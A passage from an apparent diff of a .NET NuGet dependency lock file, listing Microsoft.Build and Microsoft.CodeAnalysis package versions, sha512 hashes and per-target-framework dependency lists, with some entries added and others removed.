"netcoreapp2.1": [], "netcoreapp2.2": [], "netcoreapp3.0": [], "netcoreapp3.1": [], "netstandard": [], "netstandard1.0": [], "netstandard1.1": [], "netstandard1.2": [], "netstandard1.3": [], "netstandard1.4": [], "netstandard1.5": [], "netstandard1.6": [], "netstandard2.0": [], "netstandard2.1": []}, "targeting_pack_overrides": [], "framework_list": []}, + {"name": "Microsoft.Build.Framework", "id": "Microsoft.Build.Framework", "version": "17.12.6", "sha512": "sha512-UjfxnrQN9BPVtO0Kvv2FB5dpN2CX5snc7coq5vVQdbCV6kdSpI/r+GZTLvU/5BTT8y8bvIUqoocxRR674N6bWg==", "sources": ["https://api.nuget.org/v3/index.json"], "dependencies": {"net11": [], "net20": [], "net30": [], "net35": [], "net40": [], "net403": [], "net45": [], "net451": [], "net452": [], "net46": [], "net461": ["System.Memory", "System.Runtime.CompilerServices.Unsafe"], "net462": ["System.Memory", "System.Runtime.CompilerServices.Unsafe"], "net47": ["System.Memory", "System.Runtime.CompilerServices.Unsafe"], "net471": ["System.Memory", "System.Runtime.CompilerServices.Unsafe"], "net472": ["System.Runtime.CompilerServices.Unsafe"], "net48": ["System.Runtime.CompilerServices.Unsafe"], "net5.0": ["System.Memory", "System.Runtime.CompilerServices.Unsafe"], "net6.0": ["System.Memory", "System.Runtime.CompilerServices.Unsafe"], "net7.0": ["System.Memory", "System.Runtime.CompilerServices.Unsafe"], "net8.0": ["System.Memory", "System.Runtime.CompilerServices.Unsafe"], "net9.0": [], "netcoreapp1.0": [], "netcoreapp1.1": [], "netcoreapp2.0": ["System.Memory", "System.Runtime.CompilerServices.Unsafe"], "netcoreapp2.1": ["System.Memory", "System.Runtime.CompilerServices.Unsafe"], "netcoreapp2.2": ["System.Memory", "System.Runtime.CompilerServices.Unsafe"], "netcoreapp3.0": ["System.Memory", "System.Runtime.CompilerServices.Unsafe"], "netcoreapp3.1": ["System.Memory", "System.Runtime.CompilerServices.Unsafe"], "netstandard": [], "netstandard1.0": [], "netstandard1.1": [], "netstandard1.2": [], "netstandard1.3": [], "netstandard1.4": [], "netstandard1.5": [], "netstandard1.6": [], "netstandard2.0": ["System.Memory", "System.Runtime.CompilerServices.Unsafe"], "netstandard2.1": ["System.Memory", "System.Runtime.CompilerServices.Unsafe"]}, "targeting_pack_overrides": [], "framework_list": []}, + {"name": "Microsoft.Build.Utilities.Core", "id": "Microsoft.Build.Utilities.Core", "version": "17.5.0", "sha512": "sha512-La1NFQ7SVz1pVGEUnG15BQG26jJkRMCiitySBXLhuTYf9IG6eZ5j5UFjnM4EFKSVKbictRv+D/F0dQtsCiK9ag==", "sources": ["https://api.nuget.org/v3/index.json"], "dependencies": {"net11": [], "net20": [], "net30": [], "net35": [], "net40": [], "net403": [], "net45": [], "net451": [], "net452": [], "net46": [], "net461": ["Microsoft.Build.Framework", "Microsoft.NET.StringTools", "System.Collections.Immutable", "System.Configuration.ConfigurationManager", "System.Text.Encoding.CodePages"], "net462": ["Microsoft.Build.Framework", "Microsoft.NET.StringTools", "System.Collections.Immutable", "System.Configuration.ConfigurationManager", "System.Text.Encoding.CodePages"], "net47": ["Microsoft.Build.Framework", "Microsoft.NET.StringTools", "System.Collections.Immutable", "System.Configuration.ConfigurationManager", "System.Text.Encoding.CodePages"], "net471": ["Microsoft.Build.Framework", "Microsoft.NET.StringTools", "System.Collections.Immutable", "System.Configuration.ConfigurationManager", "System.Text.Encoding.CodePages"], "net472": ["Microsoft.Build.Framework", "Microsoft.NET.StringTools", "System.Collections.Immutable", "System.Configuration.ConfigurationManager"], "net48": ["Microsoft.Build.Framework", "Microsoft.NET.StringTools", "System.Collections.Immutable", "System.Configuration.ConfigurationManager"], "net5.0": ["Microsoft.Build.Framework", "Microsoft.NET.StringTools", "System.Collections.Immutable", "System.Configuration.ConfigurationManager", "System.Text.Encoding.CodePages"], "net6.0": ["Microsoft.Build.Framework", "Microsoft.NET.StringTools", "System.Collections.Immutable", "System.Configuration.ConfigurationManager", "System.Text.Encoding.CodePages"], "net7.0": ["Microsoft.Build.Framework", "Microsoft.NET.StringTools", "System.Collections.Immutable", "System.Configuration.ConfigurationManager"], "net8.0": ["Microsoft.Build.Framework", "Microsoft.NET.StringTools", "System.Collections.Immutable", "System.Configuration.ConfigurationManager"], "net9.0": ["Microsoft.Build.Framework", "Microsoft.NET.StringTools", "System.Collections.Immutable", "System.Configuration.ConfigurationManager"], "netcoreapp1.0": [], "netcoreapp1.1": [], "netcoreapp2.0": ["Microsoft.Build.Framework", "Microsoft.NET.StringTools", "System.Collections.Immutable", "System.Configuration.ConfigurationManager", "System.Text.Encoding.CodePages"], "netcoreapp2.1": ["Microsoft.Build.Framework", "Microsoft.NET.StringTools", "System.Collections.Immutable", "System.Configuration.ConfigurationManager", "System.Text.Encoding.CodePages"], "netcoreapp2.2": ["Microsoft.Build.Framework", "Microsoft.NET.StringTools", "System.Collections.Immutable", "System.Configuration.ConfigurationManager", "System.Text.Encoding.CodePages"], "netcoreapp3.0": ["Microsoft.Build.Framework", "Microsoft.NET.StringTools", "System.Collections.Immutable", "System.Configuration.ConfigurationManager", "System.Text.Encoding.CodePages"], "netcoreapp3.1": ["Microsoft.Build.Framework", "Microsoft.NET.StringTools", "System.Collections.Immutable", "System.Configuration.ConfigurationManager", "System.Text.Encoding.CodePages"], "netstandard": [], "netstandard1.0": [], "netstandard1.1": [], "netstandard1.2": [], "netstandard1.3": [], "netstandard1.4": [], "netstandard1.5": [], "netstandard1.6": [], "netstandard2.0": ["Microsoft.Build.Framework", "Microsoft.NET.StringTools", "System.Collections.Immutable", "System.Configuration.ConfigurationManager", "System.Text.Encoding.CodePages"], "netstandard2.1": ["Microsoft.Build.Framework", "Microsoft.NET.StringTools", "System.Collections.Immutable", "System.Configuration.ConfigurationManager", "System.Text.Encoding.CodePages"]}, "targeting_pack_overrides": [], "framework_list": []}, + {"name": "Microsoft.CodeAnalysis", "id": "Microsoft.CodeAnalysis", "version": "4.12.0", "sha512": "sha512-saGSG86irNb5MX0/7j0Lx2T0jSGQuqa6QlohBHBcTzObPyMunQZIuIWVXlEiKwcrcEQm4rtUg/5FW43s0dqH7Q==", "sources": ["https://api.nuget.org/v3/index.json"], "dependencies": {"net11": [], "net20": [], "net30": [], "net35": [], "net40": [], "net403": [], "net45": [], "net451": [], "net452": [], "net46": [], "net461": ["Microsoft.CodeAnalysis.CSharp.Workspaces", "Microsoft.CodeAnalysis.VisualBasic.Workspaces", "Humanizer.Core", "Microsoft.Bcl.AsyncInterfaces", "Microsoft.CodeAnalysis.Analyzers", "System.Buffers", "System.Collections.Immutable", "System.Composition", "System.IO.Pipelines", "System.Memory", "System.Numerics.Vectors", "System.Reflection.Metadata", "System.Runtime.CompilerServices.Unsafe", "System.Text.Encoding.CodePages", "System.Threading.Channels", "System.Threading.Tasks.Extensions"], "net462": ["Microsoft.CodeAnalysis.CSharp.Workspaces", "Microsoft.CodeAnalysis.VisualBasic.Workspaces", "Humanizer.Core", "Microsoft.Bcl.AsyncInterfaces", "Microsoft.CodeAnalysis.Analyzers", "System.Buffers", "System.Collections.Immutable", "System.Composition", "System.IO.Pipelines", "System.Memory", "System.Numerics.Vectors", "System.Reflection.Metadata", "System.Runtime.CompilerServices.Unsafe", "System.Text.Encoding.CodePages", "System.Threading.Channels", "System.Threading.Tasks.Extensions"], "net47": ["Microsoft.CodeAnalysis.CSharp.Workspaces", "Microsoft.CodeAnalysis.VisualBasic.Workspaces", "Humanizer.Core", "Microsoft.Bcl.AsyncInterfaces", "Microsoft.CodeAnalysis.Analyzers", "System.Buffers", "System.Collections.Immutable", "System.Composition", "System.IO.Pipelines", "System.Memory", "System.Numerics.Vectors", "System.Reflection.Metadata", "System.Runtime.CompilerServices.Unsafe", "System.Text.Encoding.CodePages", "System.Threading.Channels", "System.Threading.Tasks.Extensions"], "net471": ["Microsoft.CodeAnalysis.CSharp.Workspaces", "Microsoft.CodeAnalysis.VisualBasic.Workspaces", "Humanizer.Core", "Microsoft.Bcl.AsyncInterfaces", "Microsoft.CodeAnalysis.Analyzers", "System.Buffers", "System.Collections.Immutable", "System.Composition", "System.IO.Pipelines", "System.Memory", "System.Numerics.Vectors", "System.Reflection.Metadata", "System.Runtime.CompilerServices.Unsafe", "System.Text.Encoding.CodePages", "System.Threading.Channels", "System.Threading.Tasks.Extensions"], "net472": ["Microsoft.CodeAnalysis.CSharp.Workspaces", "Microsoft.CodeAnalysis.VisualBasic.Workspaces", "Humanizer.Core", "Microsoft.Bcl.AsyncInterfaces", "Microsoft.CodeAnalysis.Analyzers", "System.Buffers", "System.Collections.Immutable", "System.Composition", "System.IO.Pipelines", "System.Memory", "System.Numerics.Vectors", "System.Reflection.Metadata", "System.Runtime.CompilerServices.Unsafe", "System.Text.Encoding.CodePages", "System.Threading.Channels", "System.Threading.Tasks.Extensions"], "net48": ["Microsoft.CodeAnalysis.CSharp.Workspaces", "Microsoft.CodeAnalysis.VisualBasic.Workspaces", "Humanizer.Core", "Microsoft.Bcl.AsyncInterfaces", "Microsoft.CodeAnalysis.Analyzers", "System.Buffers", "System.Collections.Immutable", "System.Composition", "System.IO.Pipelines", "System.Memory", "System.Numerics.Vectors", "System.Reflection.Metadata", "System.Runtime.CompilerServices.Unsafe", "System.Text.Encoding.CodePages", "System.Threading.Channels", "System.Threading.Tasks.Extensions"], "net5.0": ["Microsoft.CodeAnalysis.CSharp.Workspaces", "Microsoft.CodeAnalysis.VisualBasic.Workspaces", "Humanizer.Core", "Microsoft.Bcl.AsyncInterfaces", "Microsoft.CodeAnalysis.Analyzers", "System.Buffers", "System.Collections.Immutable", "System.Composition", "System.IO.Pipelines", "System.Memory", "System.Numerics.Vectors", "System.Reflection.Metadata", "System.Runtime.CompilerServices.Unsafe", "System.Text.Encoding.CodePages", "System.Threading.Channels", "System.Threading.Tasks.Extensions"], "net6.0": ["Microsoft.CodeAnalysis.CSharp.Workspaces", "Microsoft.CodeAnalysis.VisualBasic.Workspaces", "Humanizer.Core", "Microsoft.Bcl.AsyncInterfaces", "Microsoft.CodeAnalysis.Analyzers", "System.Buffers", "System.Collections.Immutable", "System.Composition", "System.IO.Pipelines", "System.Memory", "System.Numerics.Vectors", "System.Reflection.Metadata", "System.Runtime.CompilerServices.Unsafe", "System.Text.Encoding.CodePages", "System.Threading.Channels", "System.Threading.Tasks.Extensions"], "net7.0": ["Microsoft.CodeAnalysis.CSharp.Workspaces", "Microsoft.CodeAnalysis.VisualBasic.Workspaces", "Humanizer.Core", "Microsoft.Bcl.AsyncInterfaces", "Microsoft.CodeAnalysis.Analyzers", "System.Buffers", "System.Collections.Immutable", "System.Composition", "System.IO.Pipelines", "System.Memory", "System.Numerics.Vectors", "System.Reflection.Metadata", "System.Runtime.CompilerServices.Unsafe", "System.Text.Encoding.CodePages", "System.Threading.Channels", "System.Threading.Tasks.Extensions"], "net8.0": ["Microsoft.CodeAnalysis.CSharp.Workspaces", "Microsoft.CodeAnalysis.VisualBasic.Workspaces", "Humanizer.Core", "Microsoft.Bcl.AsyncInterfaces", "Microsoft.CodeAnalysis.Analyzers", "System.Buffers", "System.Collections.Immutable", "System.Composition", "System.IO.Pipelines", "System.Memory", "System.Numerics.Vectors", "System.Reflection.Metadata", "System.Runtime.CompilerServices.Unsafe", "System.Text.Encoding.CodePages", "System.Threading.Channels", "System.Threading.Tasks.Extensions"], "net9.0": ["Microsoft.CodeAnalysis.CSharp.Workspaces", "Microsoft.CodeAnalysis.VisualBasic.Workspaces", "Humanizer.Core", "Microsoft.Bcl.AsyncInterfaces", "Microsoft.CodeAnalysis.Analyzers", "System.Buffers", "System.Collections.Immutable", "System.Composition", "System.IO.Pipelines", "System.Memory", "System.Numerics.Vectors", "System.Reflection.Metadata", "System.Runtime.CompilerServices.Unsafe", "System.Text.Encoding.CodePages", "System.Threading.Channels", "System.Threading.Tasks.Extensions"], "netcoreapp1.0": [], "netcoreapp1.1": [], "netcoreapp2.0": ["Microsoft.CodeAnalysis.CSharp.Workspaces", "Microsoft.CodeAnalysis.VisualBasic.Workspaces", "Humanizer.Core", "Microsoft.Bcl.AsyncInterfaces", "Microsoft.CodeAnalysis.Analyzers", "System.Buffers", "System.Collections.Immutable", "System.Composition", "System.IO.Pipelines", "System.Memory", "System.Numerics.Vectors", "System.Reflection.Metadata", "System.Runtime.CompilerServices.Unsafe", "System.Text.Encoding.CodePages", "System.Threading.Channels", "System.Threading.Tasks.Extensions"], "netcoreapp2.1": ["Microsoft.CodeAnalysis.CSharp.Workspaces", "Microsoft.CodeAnalysis.VisualBasic.Workspaces", "Humanizer.Core", "Microsoft.Bcl.AsyncInterfaces", "Microsoft.CodeAnalysis.Analyzers", "System.Buffers", "System.Collections.Immutable", "System.Composition", "System.IO.Pipelines", "System.Memory", "System.Numerics.Vectors", "System.Reflection.Metadata", "System.Runtime.CompilerServices.Unsafe", "System.Text.Encoding.CodePages", "System.Threading.Channels", "System.Threading.Tasks.Extensions"], "netcoreapp2.2": ["Microsoft.CodeAnalysis.CSharp.Workspaces", "Microsoft.CodeAnalysis.VisualBasic.Workspaces", "Humanizer.Core", "Microsoft.Bcl.AsyncInterfaces", "Microsoft.CodeAnalysis.Analyzers", "System.Buffers", "System.Collections.Immutable", "System.Composition", "System.IO.Pipelines", "System.Memory", "System.Numerics.Vectors", "System.Reflection.Metadata", "System.Runtime.CompilerServices.Unsafe", "System.Text.Encoding.CodePages", "System.Threading.Channels", "System.Threading.Tasks.Extensions"], "netcoreapp3.0": ["Microsoft.CodeAnalysis.CSharp.Workspaces", "Microsoft.CodeAnalysis.VisualBasic.Workspaces", "Humanizer.Core", "Microsoft.Bcl.AsyncInterfaces", "Microsoft.CodeAnalysis.Analyzers", "System.Buffers", "System.Collections.Immutable", "System.Composition", "System.IO.Pipelines", "System.Memory", "System.Numerics.Vectors", "System.Reflection.Metadata", "System.Runtime.CompilerServices.Unsafe", "System.Text.Encoding.CodePages", "System.Threading.Channels", "System.Threading.Tasks.Extensions"], "netcoreapp3.1": ["Microsoft.CodeAnalysis.CSharp.Workspaces", "Microsoft.CodeAnalysis.VisualBasic.Workspaces", "Humanizer.Core", "Microsoft.Bcl.AsyncInterfaces", "Microsoft.CodeAnalysis.Analyzers", "System.Buffers", "System.Collections.Immutable", "System.Composition", "System.IO.Pipelines", "System.Memory", "System.Numerics.Vectors", "System.Reflection.Metadata", "System.Runtime.CompilerServices.Unsafe", "System.Text.Encoding.CodePages", "System.Threading.Channels", "System.Threading.Tasks.Extensions"], "netstandard": [], "netstandard1.0": [], "netstandard1.1": [], "netstandard1.2": [], "netstandard1.3": [], "netstandard1.4": [], "netstandard1.5": [], "netstandard1.6": [], "netstandard2.0": ["Microsoft.CodeAnalysis.CSharp.Workspaces", "Microsoft.CodeAnalysis.VisualBasic.Workspaces", "Humanizer.Core", "Microsoft.Bcl.AsyncInterfaces", "Microsoft.CodeAnalysis.Analyzers", "System.Buffers", "System.Collections.Immutable", "System.Composition", "System.IO.Pipelines", "System.Memory", "System.Numerics.Vectors", "System.Reflection.Metadata", "System.Runtime.CompilerServices.Unsafe", "System.Text.Encoding.CodePages", "System.Threading.Channels", "System.Threading.Tasks.Extensions"], "netstandard2.1": ["Microsoft.CodeAnalysis.CSharp.Workspaces", "Microsoft.CodeAnalysis.VisualBasic.Workspaces", "Humanizer.Core", "Microsoft.Bcl.AsyncInterfaces", "Microsoft.CodeAnalysis.Analyzers", "System.Buffers", "System.Collections.Immutable", "System.Composition", "System.IO.Pipelines", "System.Memory", "System.Numerics.Vectors", "System.Reflection.Metadata", "System.Runtime.CompilerServices.Unsafe", "System.Text.Encoding.CodePages", "System.Threading.Channels", "System.Threading.Tasks.Extensions"]}, "targeting_pack_overrides": [], "framework_list": []}, {"name": "Microsoft.CodeAnalysis.Analyzers", "id": "Microsoft.CodeAnalysis.Analyzers", "version": "3.3.4", "sha512": "sha512-I+Riw6/6WjNICydoiNpDjN/GGP7u4XsL6VsI9lG/OjFufH3flvSEy/fxNhGDVGwZWwq/5BlnqX+LH2dmheaPfg==", "sources": ["https://api.nuget.org/v3/index.json"], "dependencies": {"net11": [], "net20": [], "net30": [], "net35": [], "net40": [], "net403": [], "net45": [], "net451": [], "net452": [], "net46": [], "net461": [], "net462": [], "net47": [], "net471": [], "net472": [], "net48": [], "net5.0": [], "net6.0": [], "net7.0": [], "net8.0": [], "net9.0": [], "netcoreapp1.0": [], "netcoreapp1.1": [], "netcoreapp2.0": [], "netcoreapp2.1": [], "netcoreapp2.2": [], "netcoreapp3.0": [], "netcoreapp3.1": [], "netstandard": [], "netstandard1.0": [], "netstandard1.1": [], "netstandard1.2": [], "netstandard1.3": [], "netstandard1.4": [], "netstandard1.5": [], "netstandard1.6": [], "netstandard2.0": [], "netstandard2.1": []}, "targeting_pack_overrides": [], "framework_list": []}, - {"name": "Microsoft.CodeAnalysis.Common", "id": "Microsoft.CodeAnalysis.Common", "version": "4.9.2", "sha512": "sha512-XCtqPQdnoqfrBSidFWIESm8exXVHF4yPY94e84St2PVZPc2bGeQNXdFNwadu1Bd2sr/bAgM5B0UHbCqBz+/SeQ==", "sources": ["https://api.nuget.org/v3/index.json"], "dependencies": {"net11": [], "net20": [], "net30": [], "net35": [], "net40": [], "net403": [], "net45": [], "net451": [], "net452": [], "net46": [], "net461": ["Microsoft.CodeAnalysis.Analyzers", "System.Collections.Immutable", "System.Reflection.Metadata", "System.Runtime.CompilerServices.Unsafe"], "net462": ["Microsoft.CodeAnalysis.Analyzers", "System.Collections.Immutable", "System.Reflection.Metadata", "System.Runtime.CompilerServices.Unsafe"], "net47": ["Microsoft.CodeAnalysis.Analyzers", "System.Collections.Immutable", "System.Reflection.Metadata", "System.Runtime.CompilerServices.Unsafe"], "net471": ["Microsoft.CodeAnalysis.Analyzers", "System.Collections.Immutable", "System.Reflection.Metadata", "System.Runtime.CompilerServices.Unsafe"], "net472": ["Microsoft.CodeAnalysis.Analyzers", "System.Collections.Immutable", "System.Reflection.Metadata", "System.Runtime.CompilerServices.Unsafe"], "net48": ["Microsoft.CodeAnalysis.Analyzers", "System.Collections.Immutable", "System.Reflection.Metadata", "System.Runtime.CompilerServices.Unsafe"], "net5.0": ["Microsoft.CodeAnalysis.Analyzers", "System.Collections.Immutable", "System.Reflection.Metadata", "System.Runtime.CompilerServices.Unsafe"], "net6.0": ["Microsoft.CodeAnalysis.Analyzers", "System.Collections.Immutable", "System.Reflection.Metadata", "System.Runtime.CompilerServices.Unsafe"], "net7.0": ["Microsoft.CodeAnalysis.Analyzers", "System.Collections.Immutable", "System.Reflection.Metadata", "System.Runtime.CompilerServices.Unsafe"], "net8.0": ["Microsoft.CodeAnalysis.Analyzers", "System.Collections.Immutable", "System.Reflection.Metadata", "System.Runtime.CompilerServices.Unsafe"], "net9.0": ["Microsoft.CodeAnalysis.Analyzers", "System.Collections.Immutable", "System.Reflection.Metadata", "System.Runtime.CompilerServices.Unsafe"], "netcoreapp1.0": [], "netcoreapp1.1": [], "netcoreapp2.0": ["Microsoft.CodeAnalysis.Analyzers", "System.Collections.Immutable", "System.Reflection.Metadata", "System.Runtime.CompilerServices.Unsafe"], "netcoreapp2.1": ["Microsoft.CodeAnalysis.Analyzers", "System.Collections.Immutable", "System.Reflection.Metadata", "System.Runtime.CompilerServices.Unsafe"], "netcoreapp2.2": ["Microsoft.CodeAnalysis.Analyzers", "System.Collections.Immutable", "System.Reflection.Metadata", "System.Runtime.CompilerServices.Unsafe"], "netcoreapp3.0": ["Microsoft.CodeAnalysis.Analyzers", "System.Collections.Immutable", "System.Reflection.Metadata", "System.Runtime.CompilerServices.Unsafe"], "netcoreapp3.1": ["Microsoft.CodeAnalysis.Analyzers", "System.Collections.Immutable", "System.Reflection.Metadata", "System.Runtime.CompilerServices.Unsafe"], "netstandard": [], "netstandard1.0": [], "netstandard1.1": [], "netstandard1.2": [], "netstandard1.3": [], "netstandard1.4": [], "netstandard1.5": [], "netstandard1.6": [], "netstandard2.0": ["Microsoft.CodeAnalysis.Analyzers", "System.Collections.Immutable", "System.Reflection.Metadata", "System.Runtime.CompilerServices.Unsafe"], "netstandard2.1": ["Microsoft.CodeAnalysis.Analyzers", "System.Collections.Immutable", "System.Reflection.Metadata", "System.Runtime.CompilerServices.Unsafe"]}, "targeting_pack_overrides": [], "framework_list": []}, - {"name": "Microsoft.CodeAnalysis.CSharp", "id": "Microsoft.CodeAnalysis.CSharp", "version": "4.9.2", "sha512": "sha512-oy5nUdJOaOQEjUZimhYH4xU6nVxt8ctkdP7HT2fc32ecvH50QeIwJXgjNt7MGUyhJO+Wd3SipQWQ5QyDw7VuLg==", "sources": ["https://api.nuget.org/v3/index.json"], "dependencies": {"net11": [], "net20": [], "net30": [], "net35": [], "net40": [], "net403": [], "net45": [], "net451": [], "net452": [], "net46": [], "net461": ["Microsoft.CodeAnalysis.Common"], "net462": ["Microsoft.CodeAnalysis.Common"], "net47": ["Microsoft.CodeAnalysis.Common"], "net471": ["Microsoft.CodeAnalysis.Common"], "net472": ["Microsoft.CodeAnalysis.Common"], "net48": ["Microsoft.CodeAnalysis.Common"], "net5.0": ["Microsoft.CodeAnalysis.Common"], "net6.0": ["Microsoft.CodeAnalysis.Common"], "net7.0": ["Microsoft.CodeAnalysis.Common"], "net8.0": ["Microsoft.CodeAnalysis.Common"], "net9.0": ["Microsoft.CodeAnalysis.Common"], "netcoreapp1.0": [], "netcoreapp1.1": [], "netcoreapp2.0": ["Microsoft.CodeAnalysis.Common"], "netcoreapp2.1": ["Microsoft.CodeAnalysis.Common"], "netcoreapp2.2": ["Microsoft.CodeAnalysis.Common"], "netcoreapp3.0": ["Microsoft.CodeAnalysis.Common"], "netcoreapp3.1": ["Microsoft.CodeAnalysis.Common"], "netstandard": [], "netstandard1.0": [], "netstandard1.1": [], "netstandard1.2": [], "netstandard1.3": [], "netstandard1.4": [], "netstandard1.5": [], "netstandard1.6": [], "netstandard2.0": ["Microsoft.CodeAnalysis.Common"], "netstandard2.1": ["Microsoft.CodeAnalysis.Common"]}, "targeting_pack_overrides": [], "framework_list": []}, - {"name": "Microsoft.CodeAnalysis.CSharp.Workspaces", "id": "Microsoft.CodeAnalysis.CSharp.Workspaces", "version": "4.9.2", "sha512": "sha512-NfP1c+OjN0KbFxhSN2DXilIjZzH6p/DzkF+yemB0v/7nhQkvRq7cDle6TpWgpw12JKOSa6lSirfECbRSyLFGhA==", "sources": ["https://api.nuget.org/v3/index.json"], "dependencies": {"net11": [], "net20": [], "net30": [], "net35": [], "net40": [], "net403": [], "net45": [], "net451": [], "net452": [], "net46": [], "net461": ["Microsoft.CodeAnalysis.Common", "Microsoft.CodeAnalysis.CSharp", "Microsoft.CodeAnalysis.Workspaces.Common", "Humanizer.Core"], "net462": ["Microsoft.CodeAnalysis.Common", "Microsoft.CodeAnalysis.CSharp", "Microsoft.CodeAnalysis.Workspaces.Common", "Humanizer.Core"], "net47": ["Microsoft.CodeAnalysis.Common", "Microsoft.CodeAnalysis.CSharp", "Microsoft.CodeAnalysis.Workspaces.Common", "Humanizer.Core"], "net471": ["Microsoft.CodeAnalysis.Common", "Microsoft.CodeAnalysis.CSharp", "Microsoft.CodeAnalysis.Workspaces.Common", "Humanizer.Core"], "net472": ["Microsoft.CodeAnalysis.Common", "Microsoft.CodeAnalysis.CSharp", "Microsoft.CodeAnalysis.Workspaces.Common", "Humanizer.Core"], "net48": ["Microsoft.CodeAnalysis.Common", "Microsoft.CodeAnalysis.CSharp", "Microsoft.CodeAnalysis.Workspaces.Common", "Humanizer.Core"], "net5.0": ["Microsoft.CodeAnalysis.Common", "Microsoft.CodeAnalysis.CSharp", "Microsoft.CodeAnalysis.Workspaces.Common", "Humanizer.Core"], "net6.0": ["Microsoft.CodeAnalysis.Common", "Microsoft.CodeAnalysis.CSharp", "Microsoft.CodeAnalysis.Workspaces.Common", "Humanizer.Core"], "net7.0": ["Microsoft.CodeAnalysis.Common", "Microsoft.CodeAnalysis.CSharp", "Microsoft.CodeAnalysis.Workspaces.Common", "Humanizer.Core"], "net8.0": ["Microsoft.CodeAnalysis.Common", "Microsoft.CodeAnalysis.CSharp", "Microsoft.CodeAnalysis.Workspaces.Common", "Humanizer.Core"], "net9.0": ["Microsoft.CodeAnalysis.Common", "Microsoft.CodeAnalysis.CSharp", "Microsoft.CodeAnalysis.Workspaces.Common", "Humanizer.Core"], "netcoreapp1.0": [], "netcoreapp1.1": [], "netcoreapp2.0": ["Microsoft.CodeAnalysis.Common", "Microsoft.CodeAnalysis.CSharp", "Microsoft.CodeAnalysis.Workspaces.Common", "Humanizer.Core"], "netcoreapp2.1": ["Microsoft.CodeAnalysis.Common", "Microsoft.CodeAnalysis.CSharp", "Microsoft.CodeAnalysis.Workspaces.Common", "Humanizer.Core"], "netcoreapp2.2": ["Microsoft.CodeAnalysis.Common", "Microsoft.CodeAnalysis.CSharp", "Microsoft.CodeAnalysis.Workspaces.Common", "Humanizer.Core"], "netcoreapp3.0": ["Microsoft.CodeAnalysis.Common", "Microsoft.CodeAnalysis.CSharp", "Microsoft.CodeAnalysis.Workspaces.Common", "Humanizer.Core"], "netcoreapp3.1": ["Microsoft.CodeAnalysis.Common", "Microsoft.CodeAnalysis.CSharp", "Microsoft.CodeAnalysis.Workspaces.Common", "Humanizer.Core"], "netstandard": [], "netstandard1.0": [], "netstandard1.1": [], "netstandard1.2": [], "netstandard1.3": [], "netstandard1.4": [], "netstandard1.5": [], "netstandard1.6": [], "netstandard2.0": ["Microsoft.CodeAnalysis.Common", "Microsoft.CodeAnalysis.CSharp", "Microsoft.CodeAnalysis.Workspaces.Common", "Humanizer.Core"], "netstandard2.1": ["Microsoft.CodeAnalysis.Common", "Microsoft.CodeAnalysis.CSharp", "Microsoft.CodeAnalysis.Workspaces.Common", "Humanizer.Core"]}, "targeting_pack_overrides": [], "framework_list": []}, - {"name": "Microsoft.CodeAnalysis.VisualBasic", "id": "Microsoft.CodeAnalysis.VisualBasic", "version": "4.9.2", "sha512": "sha512-Jx3d7jpZ2bdCb/FzVBPD2a4P8jFDhdoEugGoxLxVKtBDzHA5+RdQL0BWvzwrP1Tdw3YPshrUelNlZXmcNXqZyA==", "sources": ["https://api.nuget.org/v3/index.json"], "dependencies": {"net11": [], "net20": [], "net30": [], "net35": [], "net40": [], "net403": [], "net45": [], "net451": [], "net452": [], "net46": [], "net461": ["Microsoft.CodeAnalysis.Common"], "net462": ["Microsoft.CodeAnalysis.Common"], "net47": ["Microsoft.CodeAnalysis.Common"], "net471": ["Microsoft.CodeAnalysis.Common"], "net472": ["Microsoft.CodeAnalysis.Common"], "net48": ["Microsoft.CodeAnalysis.Common"], "net5.0": ["Microsoft.CodeAnalysis.Common"], "net6.0": ["Microsoft.CodeAnalysis.Common"], "net7.0": ["Microsoft.CodeAnalysis.Common"], "net8.0": ["Microsoft.CodeAnalysis.Common"], "net9.0": ["Microsoft.CodeAnalysis.Common"], "netcoreapp1.0": [], "netcoreapp1.1": [], "netcoreapp2.0": ["Microsoft.CodeAnalysis.Common"], "netcoreapp2.1": ["Microsoft.CodeAnalysis.Common"], "netcoreapp2.2": ["Microsoft.CodeAnalysis.Common"], "netcoreapp3.0": ["Microsoft.CodeAnalysis.Common"], "netcoreapp3.1": ["Microsoft.CodeAnalysis.Common"], "netstandard": [], "netstandard1.0": [], "netstandard1.1": [], "netstandard1.2": [], "netstandard1.3": [], "netstandard1.4": [], "netstandard1.5": [], "netstandard1.6": [], "netstandard2.0": ["Microsoft.CodeAnalysis.Common"], "netstandard2.1": ["Microsoft.CodeAnalysis.Common"]}, "targeting_pack_overrides": [], "framework_list": []}, - {"name": "Microsoft.CodeAnalysis.VisualBasic.Workspaces", "id": "Microsoft.CodeAnalysis.VisualBasic.Workspaces", "version": "4.9.2", "sha512": "sha512-v07rvZvckHiPLDzKXFs9AXfEGsDeTvR+N9YHO9wQqboXgms4HCv0fTrZOOgqM/aVS7racJKRo1tf62UfjqMeEw==", "sources": ["https://api.nuget.org/v3/index.json"], "dependencies": {"net11": [], "net20": [], "net30": [], "net35": [], "net40": [], "net403": [], "net45": [], "net451": [], "net452": [], "net46": [], "net461": ["Microsoft.CodeAnalysis.Common", "Microsoft.CodeAnalysis.VisualBasic", "Microsoft.CodeAnalysis.Workspaces.Common"], "net462": ["Microsoft.CodeAnalysis.Common", "Microsoft.CodeAnalysis.VisualBasic", "Microsoft.CodeAnalysis.Workspaces.Common"], "net47": ["Microsoft.CodeAnalysis.Common", "Microsoft.CodeAnalysis.VisualBasic", "Microsoft.CodeAnalysis.Workspaces.Common"], "net471": ["Microsoft.CodeAnalysis.Common", "Microsoft.CodeAnalysis.VisualBasic", "Microsoft.CodeAnalysis.Workspaces.Common"], "net472": ["Microsoft.CodeAnalysis.Common", "Microsoft.CodeAnalysis.VisualBasic", "Microsoft.CodeAnalysis.Workspaces.Common"], "net48": ["Microsoft.CodeAnalysis.Common", "Microsoft.CodeAnalysis.VisualBasic", "Microsoft.CodeAnalysis.Workspaces.Common"], "net5.0": ["Microsoft.CodeAnalysis.Common", "Microsoft.CodeAnalysis.VisualBasic", "Microsoft.CodeAnalysis.Workspaces.Common"], "net6.0": ["Microsoft.CodeAnalysis.Common", "Microsoft.CodeAnalysis.VisualBasic", "Microsoft.CodeAnalysis.Workspaces.Common"], "net7.0": ["Microsoft.CodeAnalysis.Common", "Microsoft.CodeAnalysis.VisualBasic", "Microsoft.CodeAnalysis.Workspaces.Common"], "net8.0": ["Microsoft.CodeAnalysis.Common", "Microsoft.CodeAnalysis.VisualBasic", "Microsoft.CodeAnalysis.Workspaces.Common"], "net9.0": ["Microsoft.CodeAnalysis.Common", "Microsoft.CodeAnalysis.VisualBasic", 